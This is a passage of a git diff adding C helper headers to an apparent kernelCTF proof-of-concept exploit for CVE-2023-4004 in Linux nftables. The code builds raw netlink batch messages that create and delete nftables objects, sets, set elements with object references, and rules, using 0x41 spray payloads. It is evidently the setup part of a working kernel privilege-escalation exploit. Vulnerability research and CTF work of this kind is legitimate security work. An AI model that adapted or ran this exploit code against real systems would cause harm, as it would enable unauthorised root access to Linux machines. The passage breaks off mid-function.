NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + char *a = malloc(0x100); + memset(a,0x41,0x100); + + nla_put_u8(data, NFTA_CT_EXPECT_L4PROTO, 0x41); + nla_put_u16(data, NFTA_CT_EXPECT_DPORT, 0x4141); + nla_put_u32(data, NFTA_CT_EXPECT_TIMEOUT, 0x41414141); + nla_put_u8(data, NFTA_CT_EXPECT_SIZE, 0x41); + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_CT_EXPECT)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object tunnel %s\n",obj_name); + } +} +void new_obj_tunnel(struct nl_sock * socket, char *table_name, char *obj_name, void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + struct nl_msg *ip = nlmsg_alloc(); + struct nl_msg *opts = nlmsg_alloc(); + struct nl_msg *opts_gen = nlmsg_alloc(); + //init ip + char *a = malloc(0x100); + memset(a,0x41,0x100); + nla_put_u32(ip, NFTA_TUNNEL_KEY_IP_DST, 0x41414141); + + nla_put_u16(opts_gen, NFTA_TUNNEL_KEY_GENEVE_CLASS, 0x10); + nla_put(opts_gen, NFTA_TUNNEL_KEY_GENEVE_DATA, 0x80, a); + nla_put_u8(opts_gen, NFTA_TUNNEL_KEY_GENEVE_TYPE, 0x10); + + nla_put_nested(opts, NFTA_TUNNEL_KEY_OPTS_GENEVE|NLA_F_NESTED, opts_gen); + //struct nlattr *nla = nla_reserve(opts, NFTA_TUNNEL_KEY_OPTS_GENEVE, nlmsg_datalen(opts_gen->nm_nlh)); + //nla->nla_type |= NLA_F_NESTED; + //memcpy(nla_data(nla), nlmsg_data(opts_gen->nm_nlh),nlmsg_datalen(opts_gen->nm_nlh)); + + nla_put_u32(data, NFTA_TUNNEL_KEY_ID, 0x41414141); + nla_put_nested(data, NFTA_TUNNEL_KEY_IP, ip); + nla_put_nested(data, NFTA_TUNNEL_KEY_OPTS, opts); + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_TUNNEL)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object tunnel %s\n",obj_name); + } +} + +void new_obj_quota(struct nl_sock * socket, char *table_name, char *obj_name,void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + //init ip + nla_put_u64(data, NFTA_QUOTA_BYTES, 0x100); + + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_QUOTA)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object quota %s\n",obj_name); + } +} + +void get_obj(struct nl_sock * socket, char *table_name, char *obj_name, uint32_t obj_type){ + //init msg + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + nfnlmsg_put( + msg, + NL_AUTO_PID, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_SUBSYS_NFTABLES, //SUBSYS + NFT_MSG_GETOBJ, // TYPE + NLM_F_REQUEST, //NLM_F_ECHO + 2, //FAMILY + 0 //RES_ID + ); + //init msg + nla_put_u32(msg, NFTA_OBJ_TYPE, htonl(obj_type)); + nla_put_string(msg, NFTA_OBJ_NAME, obj_name); + nla_put_string(msg, NFTA_OBJ_TABLE, table_name); + + int res = nl_send_auto(socket, msg); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Get obj %s\n",obj_name); + } +} + +void del_obj(struct nl_sock * socket, char *table_name, char *obj_name, uint32_t obj_type){ + + struct nl_msg * msg = nlmsg_alloc(); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(obj_type)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Delete object %s\n",obj_name); + } + +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/rule.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/rule.h new file mode 100644 index 00000000..d1fcd292 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/rule.h @@ -0,0 +1,71 @@ +void new_rule(struct nl_sock * socket, char *table_name, char *chain_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWRULE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nl_msg * exprs = nlmsg_alloc(); + struct nl_msg *data_nest = nlmsg_alloc(); + struct nl_msg *expr_data = nlmsg_alloc(); + + char *a = malloc(0x100); + memset(a,0x41,0x100); + nla_put_string(expr_data, NFTA_MATCH_NAME, "set"); + nla_put_u32(expr_data, NFTA_MATCH_REV, htonl(0)); + nla_put(expr_data, NFTA_MATCH_INFO,0x100,a); + + nla_put_string(data_nest, NFTA_EXPR_NAME, "match"); + nla_put_nested(data_nest, NFTA_EXPR_DATA, expr_data); + + nla_put_nested(exprs, NFTA_LIST_ELEM, data_nest); + nla_put_string(msg2, NFTA_RULE_TABLE, table_name); + nla_put_string(msg2, NFTA_RULE_CHAIN, chain_name); + nla_put_nested(msg2, NFTA_RULE_EXPRESSIONS, exprs); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Create rule\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/set.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/set.h new file mode 100644 index 00000000..d053bed8 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/set.h @@ -0,0 +1,77 @@ +void new_set(struct nl_sock * socket, char *table_name, char *set_name, uint32_t obj_type){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWSET),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + struct nl_msg *data = nlmsg_alloc(); + struct nl_msg *data_nest = nlmsg_alloc(); + struct nl_msg *data_nest_nest = nlmsg_alloc(); + //init IPSET_ATTR_DATA + + int i=0; + + nla_put_u32(data_nest_nest, NFTA_SET_FIELD_LEN, htonl(0x10)); + for(i=0;i<2;i++){ + nla_put_nested(data_nest, NFTA_LIST_ELEM, data_nest_nest); + } + + nla_put_nested(data, NFTA_SET_DESC_CONCAT, data_nest); + //create test1 + nla_put_string(msg2, NFTA_SET_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_NAME, set_name); + nla_put_u32(msg2, NFTA_SET_ID, 0x10); + nla_put_nested(msg2, NFTA_SET_DESC, data); + nla_put_u32(msg2, NFTA_SET_KEY_LEN, htonl(0x40)); + nla_put_u32(msg2, NFTA_SET_FLAGS, htonl(NFT_SET_INTERVAL|NFT_SET_OBJECT|NFT_SET_CONCAT)); + nla_put_u32(msg2, NFTA_SET_OBJ_TYPE, htonl(obj_type)); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create set\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/setelem.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/setelem.h new file mode 100644 index 00000000..6e8a2a28 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/setelem.h @@ -0,0 +1,212 @@ +#define OBJ_FOR_REF "obj-for-ref" +#define ELEM_KEY_END "test-elem-key-end" +void new_setelem(struct nl_sock * socket,char *table_name, char *set_name, void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *elem = nlmsg_alloc(); + struct nl_msg *elem_nest = nlmsg_alloc(); + struct nl_msg *elem_key = nlmsg_alloc(); + struct nl_msg *elem_end = nlmsg_alloc(); + char *key = malloc(0x40); + char *key_end = malloc(0x40); + memset(key,0xff,0x40); + memset(key_end,0xff,0x40); + nla_put(elem_key, NFTA_DATA_VALUE, 0x40, key); + nla_put_nested(elem_nest, NFTA_SET_ELEM_KEY, elem_key); + nla_put_string(elem_nest, NFTA_SET_ELEM_OBJREF, OBJ_FOR_REF); + //nla_put_u32(elem_nest, NFTA_SET_ELEM_FLAGS, htonl(NFT_SET_ELEM_CATCHALL)); + if(udata>0){ + nla_put(elem_nest, NFTA_SET_ELEM_USERDATA, ulen, udata); + } + + nla_put_nested(elem, 1, elem_nest); + + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, set_name); + nla_put_nested(msg2, NFTA_SET_ELEM_LIST_ELEMENTS, elem); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create setelem\n"); + } +} + + +void del_setelem(struct nl_sock * socket){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *elem = nlmsg_alloc(); + struct nl_msg *elem_nest = nlmsg_alloc(); + struct nl_msg *elem_key = nlmsg_alloc(); + char *key = malloc(0x40); + memset(key,0x41,0x40); + nla_put(elem_key, NFTA_DATA_VALUE, 0x40, key); + nla_put_nested(elem_nest, NFTA_SET_ELEM_KEY, elem_key); + //nla_put_string(elem_nest, NFTA_SET_ELEM_OBJREF, "test-obj2"); + + nla_put_nested(elem, 1, elem_nest); + + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, "test_table"); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, "test_set"); + nla_put_nested(msg2, NFTA_SET_ELEM_LIST_ELEMENTS, elem); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len)*2 + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len), hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len), hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len)*2, hdr3, NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Delete setelem\n"); + } +} + +void elem_flush(struct nl_sock * socket, char *table_name, char *set_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * 